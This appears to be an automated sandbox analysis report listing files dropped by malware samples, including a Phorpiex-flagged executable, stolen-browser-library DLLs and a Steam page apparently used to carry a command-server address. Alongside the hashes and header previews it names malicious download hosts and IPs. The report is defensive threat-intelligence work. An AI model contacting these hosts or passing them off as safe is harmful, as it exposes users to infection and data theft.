Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1C.._..._..._.)n...._......._...^."._..^..._..\..._..[..._..Z..._.._..._......_..]..._.Rich.._.........................PE..L.....0].........."!.....(..........`........@......................................,.....@A.........................g.......r...........................A.......=..`x..8............................w..@............p.......c..@....................text....&.......(.................. ..`.data...H)...@.......,..............@....idata.......p.......D..............@..@.didat..4............X..............@....rsrc................Z..............@..@.reloc...=.......>...^..............@..B................................................................................................................................................................................................................................................................

C:\ProgramData\nss3.dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2046288
Entropy (8bit):	6.787733948558952
Encrypted:	false
SSDEEP:	49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzh:J7Tf8J1Q+SS5/nr
MD5:	1CC453CDF74F31E4D913FF9C10ACDDE2
SHA1:	6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
SHA-256:	AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
SHA-512:	DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................`........................................p......l- ...@A.........................&..........@....P..x...............P/...`..\...................................................\|...\....&..@....................text............................... ..`.rdata..l...........................@..@.data...DR..........................@....00cfg.......@......................@..@.rsrc...x....P......................@..@.reloc..\....`......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\softokn3.dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	257872
Entropy (8bit):	6.727482641240852
Encrypted:	false
SSDEEP:	6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
MD5:	4E52D739C324DB8225BD9AB2695F262F
SHA1:	71C3DA43DC5A0D2A1941E874A6D015A071783889
SHA-256:	74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
SHA-512:	2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................P...............................................Sg....@A........................Dv..S....w..........................P/.......5..8q...............................................{...............................text...&........................... ..`.rdata.............................@..@.data................\|..............@....00cfg..............................@..@.rsrc...............................@..@.reloc...5.......6..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\vcruntime140.dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	80880
Entropy (8bit):	6.920480786566406
Encrypted:	false
SSDEEP:	1536:lw2886xv555et/MCsjw0BuRK3jteo3ecbA2W86b+Ld:lw28V55At/zqw+Iq9ecbA2W8H
MD5:	A37EE36B536409056A86F50E67777DD7
SHA1:	1CAFA159292AA736FC595FC04E16325B27CD6750
SHA-256:	8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
SHA-512:	3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................08e...................................................u............Rich............PE..L...\|.0].........."!.........................................................0.......m....@A.............................................................A... ....... ..8............................ ..@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\bomb.exe.log

Download File

Process:	C:\Users\user\Desktop\bomb.exe
File Type:	CSV text
Category:	modified
Size (bytes):	1281
Entropy (8bit):	5.370111951859942
Encrypted:	false
SSDEEP:	24:ML9E4KQ71qE4GIs0E4KCKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNb:MxHKQ71qHGIs0HKCYHKGSI6oPtHTHhA2
MD5:	12C61586CD59AA6F2A21DF30501F71BD
SHA1:	E6B279DC134544867C868E3FF3C267A06CE340C7
SHA-256:	EC20A856DBBCF320F7F24C823D6E9D2FD10E9335F5DE2F56AB9A7DF1ED358543
SHA-512:	B0731F59C74C9D25A4C82E166B3DC300BBCF89F6969918EC748B867C641ED0D8E0DE81AAC68209EF140219861B4939F1B07D0885ACA112D494D23AAF9A9C03FE
Malicious:	true
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\S

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\httpmales.mugutu.comrevada66df29a06624c_cry.exe.exe.log

Download File

Process:	C:\Users\user\Desktop\httpmales.mugutu.comrevada66df29a06624c_cry.exe.exe
File Type:	CSV text
Category:	dropped
Size (bytes):	226
Entropy (8bit):	5.360398796477698
Encrypted:	false
SSDEEP:	6:Q3La/xw5DLIP12MUAvvR+uTL2ql2ABgTv:Q3La/KDLI4MWuPTAv
MD5:	3A8957C6382192B71471BD14359D0B12
SHA1:	71B96C965B65A051E7E7D10F61BEBD8CCBB88587
SHA-256:	282FBEFDDCFAA0A9DBDEE6E123791FC4B8CB870AE9D450E6394D2ACDA3D8F56D
SHA-512:	76C108641F682F785A97017728ED51565C4F74B61B24E190468E3A2843FCC43615C6C8ABE298750AF238D7A44E97C001E3BE427B49900432F905A7CE114AA9AD
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\2[1]

Download File

Process:	C:\Users\user\sysvplervcs.exe
File Type:	data
Category:	dropped
Size (bytes):	8960
Entropy (8bit):	7.980118959451248
Encrypted:	false
SSDEEP:	192:8w3f/H9pFkeMpRmPIlHDCEkAH5gWPmEt3TXxl/6LkbgewuNvm:8snHrUVjbHH5g+mEt3z64bdNvm
MD5:	39F45EDB23427EBF63197CA138DDB282
SHA1:	4BE1B15912C08F73687C0E4C74AF0979C17FF7D5
SHA-256:	77FBB0D8630024634880C37DA59CE57D1B38C7E85BDCC14C697DB9E79C24E0DE
SHA-512:	410F6BAAD25B256DAEBFA5D8B8A495429C9E26E7DE767B2A0E6E4A75E543B77DBD0ABCA0335FB1F0D91E49E292B42CEDC6EDD72D25A3C4C62330E2B31C054CC6
Malicious:	false
Preview:	$.g.r5].F.M[..o.I.........5.Eb....L6,.i%.kZ.....8....ePI\|.....<..iq....#.......O@5..U\|{`)...].H........x..-..dR~A.}"2......... +.(..R.m....d...!..(...$..5.t...F.]...<.g"...V.(1}.]C........s3..76..&...Ic...%t..h.I.b.....R(......}..IE...<.....]..C.....9....xi\|........../.....>y..4m..3..hO.....;...<.\|..5.,.0.tA`.J..Nn;.w.es...q.T.._...:<....fb7..J.H.3&. ...f..1.F.G.c..&k..,J..x+..c.`.w....s....~.........(s..F..IT...,....5\.).}..-..@........4.>a.u...e.\..v.=.I.kB..[..Q...2..c.LA.lT..rO.....U.Y..m.j#.u...U..P...>.Y{,...Tk....3.h.,v..)..P.TK3_.+..+....m..NP[..qe.......G9.f..\|........[.-&M~&..14w.._.l.a./.ok...w.M.._...w..^7Rgg....%.Tv...}....T..p...;d.Su..z.FPH...Z....I...pz5...0g..`..l..K\V3...t..r.y.l...2..R.]?cz.m....v....o.......\. ....0.o.N3.a.P..V.=BE\..... _.^hV.f.\..n.$0..q.C........7..BQ.n...}c..../.Yd=.G...-.....T.Sx..&...z.wi...:...,.a..........o.ou....Hn...8....Zx...............F^=R...nU.T.D9.'.W..L.dPi.^`ZBj..2.....z.\.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\4[1]

Download File

Process:	C:\Users\user\sysvplervcs.exe
File Type:	data
Category:	dropped
Size (bytes):	110600
Entropy (8bit):	7.998486619051527
Encrypted:	true
SSDEEP:	3072:LFQC4AbS79Bo0bTtS3v4P09loyBE7QXNn8IJrF:LFQC4A+7jfiw8HoyYQXdXF
MD5:	1FCB78FB6CF9720E9D9494C42142D885
SHA1:	FEF9C2E728AB9D56CE9ED28934B3182B6F1D5379
SHA-256:	84652BB8C63CA4FD7EB7A2D6EF44029801F3057AA2961867245A3A765928DD02
SHA-512:	CDF58E463AF1784AEA86995B3E5D6B07701C5C4095E30EC80CC901FFD448C6F4F714C521BF8796FFA8C47538BF8BF5351E157596EFAA7AB88155D63DC33F7DC3
Malicious:	false
Preview:	NGS!.....8y....j...x9"{[&..TL..,..L.nD..70Ln..MP.B..e...'.LpVJ...g...Y....]...h=....Ot(.P:...jjoF.....2y....:.P@.b...6]u...D\..i4<....Q?......._;]..!.A.4.A......1..c.sa^.+dQ!xl.6Q..8w...a7?..].T%:...H.1....$.j.......4f.k!...p.Fz.v..........?l...5...7...(.....=c.s..c.F.{..-.uE.8.D....QF...\|.8.ey.3'.@<Kq.."S.-..?..4.s......S..2..j=.e..Le.....Yh....+...[}AM.,.@...gW\..Z)..ET.../\|."...b.W........Ro.......j.(\|A,....>.?.1;..>......".&.....;u.c.y..[....t..`...w ..#.....c.dyy...s..G.x_C.h...I]..D....ey...:.FQ.Q...C.. .B.Z.n.2...@X.&>UY.g..D...YZ.)F.!..F...F...e....h4VGK.>.V......3#+.$.,.&.S...lk..I.F\..C.k$).J._l\.",.0u!.k..T....}.V...!..Y.....B....{}.....nAL...[.Xo[+.1\...m.,.^.bLMD.j.-g...... <._8d+-D./.k<..'.....dv...-.Q...i.`........N4W(._"..%.....5q..844o4..g..d..x....s...i.fc.....D..^..].....M(...A..[...gB4..m.w..AV....@.g..5.4.].....BLr!n....W.G,6+uY..9U.4..........O..P....&....?.....v.K.i..>X...7Dt...o=.2........f....bi..C.5N.>.7lf.......^..@F.O

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\newtpp[1].exe

Download File

Process:	C:\Users\user\Desktop\http185.215.113.66pei.exe.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	98304
Entropy (8bit):	6.300629641809532
Encrypted:	false
SSDEEP:	1536:y7zFjdFmav82XA3I9XRH5McIu9Xh0TRvfQaQG9MF7vnn:uRyOPA3MfCwR0toZF7vn
MD5:	930C41BC0C20865AF61A95BCF0C3B289
SHA1:	CECF37C3B6C76D9A79DD2A97CFC518621A6AC924
SHA-256:	1F2E9724DFB091059AE16C305601E21D64B5308DF76DDEF6B394573E576EF1FF
SHA-512:	FA1F33C71DA608B3980038981220FCEBEE0B0CC44331E52F5198DD2761C97631EE8286756C2CC16245A1370C83BB53CC8EA8EF64E0FCDD30AF51F023973986B2
Malicious:	true
Yara Hits:	Rule: JoeSecurity_Phorpiex_4, Description: Yara detected Phorpiex, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\newtpp[1].exe, Author: Joe Security
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m.pj)..9)..9)..9 ..9...9Q..8+..9..C9+..9..A9(..9...9+..9..s9-..9)..9...9..e9<..9 ..9-..9 ..95..9 ..9(..9Rich)..9........................PE..L......g............................@y............@.........................................................................\|0.......................................................................................................................text............................... ..`.rdata...?.......@..................@..@.data...H_...@...N...2..............@...................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\softokn3[1].dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	257872
Entropy (8bit):	6.727482641240852
Encrypted:	false
SSDEEP:	6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
MD5:	4E52D739C324DB8225BD9AB2695F262F
SHA1:	71C3DA43DC5A0D2A1941E874A6D015A071783889
SHA-256:	74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
SHA-512:	2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................P...............................................Sg....@A........................Dv..S....w..........................P/.......5..8q...............................................{...............................text...&........................... ..`.rdata.............................@..@.data................\|..............@....00cfg..............................@..@.rsrc...............................@..@.reloc...5.......6..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\sql[1].dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2459136
Entropy (8bit):	6.052474106868353
Encrypted:	false
SSDEEP:	49152:WHoJ9zGioiMjW2RrL9B8SSpiCH7cuez9A:WHoJBGqabRnj8JY/9
MD5:	90E744829865D57082A7F452EDC90DE5
SHA1:	833B178775F39675FA4E55EAB1032353514E1052
SHA-256:	036A57102385D7F0D7B2DEACF932C1C372AE30D924365B7A88F8A26657DD7550
SHA-512:	0A2D112FF7CB806A74F5EC17FE097D28107BB497D6ED5AD28EA47E6795434BA903CDB49AAF97A9A99C08CD0411F1969CAD93031246DC107C26606A898E570323
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........7.Z.Y.Z.Y.Z.Y...Z.n.Y...\..Y...]...Y...X.Y.Y.Z.X..Y.O.\.E.Y.O.].U.Y.O.Z.L.Y.l3].[.Y.l3Y.[.Y.l3..[.Y.l3[.[.Y.RichZ.Y.................PE..L...i.`e...........!...%.. .........{D........ ...............................%...........@...........................#..6....$.(.....$.......................$.....`.#.8...........................x.#.@.............$..............................text...G. ....... ................. ..`.rdata...".... ..$.... .............@..@.data...4\|... $..b....#.............@....idata........$......^$.............@..@.00cfg........$......p$.............@..@.rsrc.........$......r$.............@..@.reloc..5.....$.......$.............@..B................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\1[1]

Download File

Process:	C:\Users\user\sysvplervcs.exe
File Type:	data
Category:	dropped
Size (bytes):	110600
Entropy (8bit):	7.998486619051527
Encrypted:	true
SSDEEP:	3072:LFQC4AbS79Bo0bTtS3v4P09loyBE7QXNn8IJrF:LFQC4A+7jfiw8HoyYQXdXF
MD5:	1FCB78FB6CF9720E9D9494C42142D885
SHA1:	FEF9C2E728AB9D56CE9ED28934B3182B6F1D5379
SHA-256:	84652BB8C63CA4FD7EB7A2D6EF44029801F3057AA2961867245A3A765928DD02
SHA-512:	CDF58E463AF1784AEA86995B3E5D6B07701C5C4095E30EC80CC901FFD448C6F4F714C521BF8796FFA8C47538BF8BF5351E157596EFAA7AB88155D63DC33F7DC3
Malicious:	false
Preview:	NGS!.....8y....j...x9"{[&..TL..,..L.nD..70Ln..MP.B..e...'.LpVJ...g...Y....]...h=....Ot(.P:...jjoF.....2y....:.P@.b...6]u...D\..i4<....Q?......._;]..!.A.4.A......1..c.sa^.+dQ!xl.6Q..8w...a7?..].T%:...H.1....$.j.......4f.k!...p.Fz.v..........?l...5...7...(.....=c.s..c.F.{..-.uE.8.D....QF...\|.8.ey.3'.@<Kq.."S.-..?..4.s......S..2..j=.e..Le.....Yh....+...[}AM.,.@...gW\..Z)..ET.../\|."...b.W........Ro.......j.(\|A,....>.?.1;..>......".&.....;u.c.y..[....t..`...w ..#.....c.dyy...s..G.x_C.h...I]..D....ey...:.FQ.Q...C.. .B.Z.n.2...@X.&>UY.g..D...YZ.)F.!..F...F...e....h4VGK.>.V......3#+.$.,.&.S...lk..I.F\..C.k$).J._l\.",.0u!.k..T....}.V...!..Y.....B....{}.....nAL...[.Xo[+.1\...m.,.^.bLMD.j.-g...... <._8d+-D./.k<..'.....dv...-.Q...i.`........N4W(._"..%.....5q..844o4..g..d..x....s...i.fc.....D..^..].....M(...A..[...gB4..m.w..AV....@.g..5.4.].....BLr!n....W.G,6+uY..9U.4..........O..P....&....?.....v.K.i..>X...7Dt...o=.2........f....bi..C.5N.>.7lf.......^..@F.O

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\3[1]

Download File

Process:	C:\Users\user\sysvplervcs.exe
File Type:	data
Category:	dropped
Size (bytes):	16128
Entropy (8bit):	7.988295567506313
Encrypted:	false
SSDEEP:	384:LrvXDxrJBiEAkcXzGE+qHYhew/F2Nyoot52DzPW7L:LrvXVJ0MUzj+qH6T2Uoot8DzPu
MD5:	1568EFB715BD9797610F55AA48DFB18E
SHA1:	076C40D61A821CF3069508EE873F3D4780774CB3
SHA-256:	F42EF51C4C7C8F607A0405848593369BFC193B771E8ED687540632CAD1376216
SHA-512:	03D4357A8A1FAA9110FB023E4C504BCB284D6665848C2918A543C1928FFAC78FDF573D201932517C23A22A6E50C3DDD9D9035BBF8E735DDAE3BC0FEA8949F7E8
Malicious:	false
Preview:	..[...y.M...x..3+_[./.C.........L..I.........K0p.Pa..G.j.q..r..>.+"M.(....).....nf.....+.m...8`....@.'V...]_...{.1.&......$..".....L+.'l.5........]1Z.!H.\|...J.!./.=:jr~.2..T..^R..!t.t..3%_./:.p..@..Z-......9.....aS@..T..x.\...:....).'....D.....A...Ut...R-g.Z>..B.....q.5:9..*.y.nz.4.^...y.n..w.6_.....M7.2..p.jJt.#e.z.SW.h....4{.q.../..br.( o....l.......S..u5nw..;.i#:...X<<T.>.c.R.f.z.gz...D.G......:].....]G.=...s...u.`#Zt...9X.w4.8..~.$YJ.<.....0..}.~...,4..S....J...GJwz.b....yt..;..9...C...#.<$............v....@.0.....`../.".8.b.n...,..]..E-.Vp..Yc....Ga:.q.2o.W..O...........,.N.3#@m..y1.....~-I...-..!m..<fa..^a.k=..Fze..Mq./...(.\..R\)...Kw..x..l.M.7L.........D.. ........G+..m..\.E~......X..t:....\|2.E..X......<\..P3,q.D.x.R..G..,~...Ta...Z...~v.{.....z.J[.a..$.y...#..g.R.<....v...\.>....cjn.)?..k.....S..x.P.0....7.@...P..e@....Z.L6....Rv.oe.x.X..OK4......F....o.r'A.8K.%?R...tG..V...B}c7.!8.............=f....&dI$..W..b.O....dh.......}..N.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\5[1]

Download File

Process:	C:\Users\user\sysvplervcs.exe
File Type:	data
Category:	dropped
Size (bytes):	10496
Entropy (8bit):	7.984552619424464
Encrypted:	false
SSDEEP:	192:Jkxbr7XNTQwFtSiiFh1eBtpQ9dys4Hcbnvsi3i9FS0swDNC6:axbre0gBFh1xdyCjzWd
MD5:	CCB447088AB19BBF90A82A475D9B7247
SHA1:	E655EA7B0C172FD1F0EBA0920803C99A29B21D11
SHA-256:	40E2DB72F6E566C01904A35546370B6A458979DF2B98001762B9EE57C2FE8C73
SHA-512:	96CF9AE4D8737154433B28B46550A5F859BA31933EEF377E73A03FED20A33C81F58F8BAA5CC75E925FDE0FA68BE5C249389D1E571C00167778C0C1AEAAB5B288
Malicious:	false
Preview:	...K............=&....&..!.D...{.i"...].L.(..~.os.._.g.......r.(.Z3..V...n...?../_#Sg.`.......!..kFe....@.[{K..(.......e.....X.B:.......MX...%/..,.4..?._.0..q.)....mj...h..iP.B...(.^....3.*_....eP.N...!^g..OOC.s..L.Bd.d$......T,.J....3....C...PA..2.D..9...........x..........Zk4Da...)?.._h...sA..W.....B2.....cHQ.T....=..U...@.3.}....!...Y.G.C...X{... 4"...&..h.0..'xu..#.c.\|g...L0....)...c..M...]....oL{...:En:?.\|_X.P.........Q@. .3...o.....).u..a..[...I...+....f....Z.M..%. ].2.uz._......Gw....t.0b........Fa....MT.d..2.Y....&....T............M..X...P......}..+.....Op..Q.E.o6R;.P..>8`2.'".....~C..Z_.........,.2g.. $..l....."x...:.h;..H...........`.$-6....._-e...C?.6T..=..q...L...3.&fG)..W..G..@6.X~.%X....%R...C.h..?R...]......f...bU!.PH..h...".......R...j,d.k......e..\....~.h..n(.....,.G...<...u.1....6t......l.....w;..p..;y..rSC....._.M....6.X....h..t.G7zs..HP,e_d.d.c.n..^.M+ct\0j.r.>;......_n.q.>.x.e.z...w...o...%kkw..Fg..A/.cS..Q./=cj.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\76561199780418869[1].htm

Download File

Process:	C:\Users\user\AppData\Local\Temp\400445\Batch.pif
File Type:	HTML document, Unicode text, UTF-8 text, with very long lines (3070), with CRLF, LF line terminators
Category:	dropped
Size (bytes):	34879
Entropy (8bit):	5.398283651523707
Encrypted:	false
SSDEEP:	768:Mdpqme0Ih+3tAA6WGcefcDAhTBv++nIjBtPF5zfJkPVoEAdLTBv++nIjBtPF5x2/:Md8me0Ih+3tAA6WGceFhTBv++nIjBtPL
MD5:	4DB33CEB15BBAAE4B7718BE0A5C0C269
SHA1:	E654893B842F897CB6257CC9D1F28966B2EC2A6E
SHA-256:	D6FF36BFE521D7AAFDB6724ECBC100E131253EFA86CFC6EF3896CAAF94D69F8E
SHA-512:	54BFB5783575B833B3762133BCE561078A410F6A053FC7159795A02260AA7F91858EF8219289AAA7824A7B30C0A15FB29D5DB05461A280525AE7109A0D1C3C45
Malicious:	false
Preview:	<!DOCTYPE html>..<html class=" responsive" lang="en">..<head>...<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">.....<meta name="viewport" content="width=device-width,initial-scale=1">....<meta name="theme-color" content="#171a21">....<title>Steam Community :: u55u https://49.12.197.9\|</title>...<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon">...........<link href="https://community.akamai.steamstatic.com/public/shared/css/motiva_sans.css?v=-DH0xTYpnVe2&l=english" rel="stylesheet" type="text/css" >.<link href="https://community.akamai.steamstatic.com/public/shared/css/buttons.css?v=PUJIfhtcQn7W&l=english" rel="stylesheet" type="text/css" >.<link href="https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=ezWS9te9Zwm9&l=english" rel="stylesheet" type="text/css" >.<link href="https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&l=english" rel="stylesheet" type="text/css" >.<link href=

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\mozglue[1].dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	608080
Entropy (8bit):	6.833616094889818
Encrypted:	false
SSDEEP:	12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
MD5:	C8FD9BE83BC728CC04BEFFAFC2907FE9
SHA1:	95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
SHA-256:	BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
SHA-512:	FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........^......................................................j.....@A.........................`...W.....,.... ..................P/...0...A...S..............................h.......................Z.......................text...a........................... ..`.rdata..............................@..@.data...D...........................@....00cfg..............................@..@.tls................................@....rsrc........ ......................@..@.reloc...A...0...B..................@..B................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\nss3[1].dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2046288
Entropy (8bit):	6.787733948558952
Encrypted:	false
SSDEEP:	49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzh:J7Tf8J1Q+SS5/nr
MD5:	1CC453CDF74F31E4D913FF9C10ACDDE2
SHA1:	6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
SHA-256:	AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
SHA-512:	DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................`........................................p......l- ...@A.........................&..........@....P..x...............P/...`..\...................................................\|...\....&..@....................text............................... ..`.rdata..l...........................@..@.data...DR..........................@....00cfg.......@......................@..@.rsrc...x....P......................@..@.reloc..\....`......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\a43486128347[1].exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	530944
Entropy (8bit):	7.7381162964470676
Encrypted:	false
SSDEEP:	12288:WcdHpo/73vGjBKnTr/6p2vtJufuDf4TGHFnw9AAyJ044sP:WApMfWKnfg2juVTwKuDR
MD5:	EE52CB514436F37707471297448B1799
SHA1:	15BC180E285D103DB78C05D398EAB268F0F94842
SHA-256:	E1DFB36D4B99672B70881D92BE19DFD815EEFDFB6AEB62941F05B534E04205B4
SHA-512:	CCA4E710EB297B3E362EB0C26A71D4DD79997A06F6ECDDF9471B3E847E074EF94180A6604A3052CC93ACDA8F9A3B52E49F64DF0759E85BFC253D4ACE005A8B22
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........`.........E.....E...<...E.....E...............................................Rich............................PE..L...x..g...............).....\......Ho............@..........................`............@.................................@m..(....0.......................@......xP...............................O..@...............,............................text............................... ..`.rdata..............................@..@.data...............b..............@....rsrc........0......................@..@.reloc.......@......................@..B................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\msvcp140[1].dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	450024
Entropy (8bit):	6.673992339875127
Encrypted:	false
SSDEEP:	12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
MD5:	5FF1FCA37C466D6723EC67BE93B51442
SHA1:	34CC4E158092083B13D67D6D2BC9E57B798A303B
SHA-256:	5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
SHA-512:	4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
Malicious:	false
